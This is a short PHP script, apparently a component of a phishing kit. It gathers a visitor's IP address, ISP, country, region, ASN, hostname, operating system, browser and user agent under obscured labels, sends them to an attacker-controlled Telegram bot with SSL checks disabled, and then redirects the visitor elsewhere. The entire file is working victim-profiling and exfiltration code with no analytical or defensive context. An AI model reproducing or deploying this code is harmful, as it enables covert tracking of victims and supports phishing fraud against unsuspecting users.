<?php
$nijaep.= " VIZM "."\n"."\n";
$nijaep.= " -- 2ERB -- \n"."\n";
$nijaep.= "PAC:$ip"."\n";
$nijaep.= "ORGA:{$isp}"."\n";
$nijaep.= "TRYN:$countryname"."\n";
$nijaep.= "REGA:{$region}"."\n";
$nijaep.= "query:{$query}"."\n";
$nijaep.= "As:{$asn}"."\n";
$nijaep.= "HNAM:" . $hostname . ""."\n";
$nijaep.= "OS:{$os}"."\n";
$nijaep.= "BROR:{$browser}"."\n"."\n";
$nijaep.= "UAGG:{$_SERVER['HTTP_USER_AGENT']}"."\n";
function callAPI($url) {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
$Antibot = curl_exec($curl);
curl_close($curl);
}
$Antibot = urlencode($nijaep);
callAPI('https://api.telegram.org/bot' . $Token . '/sendMessage?chat_id=' . $ChatID . '&text=' . $Antibot . "&parse_mode=html");
header('Location: ' . $botExit);
die('');;
?>